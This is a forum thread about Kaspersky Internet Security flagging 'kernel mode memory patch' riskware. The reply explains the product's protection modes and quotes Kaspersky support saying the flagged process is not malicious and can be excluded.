Kernel Bench

Kernel News and How To

I recently got Kaspersky Internet Security software, and it has never actively informed me of there being any problems, but just out of curiosity I opened the software and it said that there had been 2 threats, "Kernel Patch Memory Mode". I looked this up, and no one said it was anything too bad so I just ignored it.

Today when I opened the software to update it, the number of "riskware"s had gone up to four, and apparently this had occurred as soon as I turned my laptop on. What is this? Is it dangerous, or does the fact that it hadn’t alerted me about these "riskwares" mean that it has already dealt with them?

Help please someone, I don’t really understand what a "kernel mode memory patch" is, after researching it.

During the application installation you can select the protection mode. Two modes are available, which are Automatic and Interactive. Did you choose Interactive, as most choose Automatic, which means KIS deals with everything in the recommended manner?

This can be changed if required, which lets KIS decide what to do when an event happens.

http://support.kaspersky.com/kis2010/tech?qid=208280386

I have started with the above as in the link below it says: "If the interactive mode is enabled in the Kaspersky Internet Security 2010 settings and in the Proactive Defense component settings the Prompt for action option is selected (the option is available only in versions from 9.0.0.736), then in some cases the Kaspersky Internet Security 2010 dialog window that will inform you about suspicious activity may appear. The process will be detected as Process (PID: 0): kernel mode memory patch…" and it goes on to say the following:

Keyloggers may send your personal information (logins, passwords, credit card numbers) you enter using your keyboard to a cyber criminal. HOWEVER, similar actions can be performed not only by malicious programs, but also by some other not malicious applications installed on your computer. Very often these actions are performed by means of hotkeys to access some functions of an application installed on your computer.

The process kernel mode memory patch (PID: 0) is not malicious. You can add this process to the exclusions list by clicking Add to exclusions, and how to do that can be seen in the link below.

This appears to be nothing to worry about. Just KIS being pedantic.

What you find under detected threats is not as important as what is under ACTIVE THREATS.
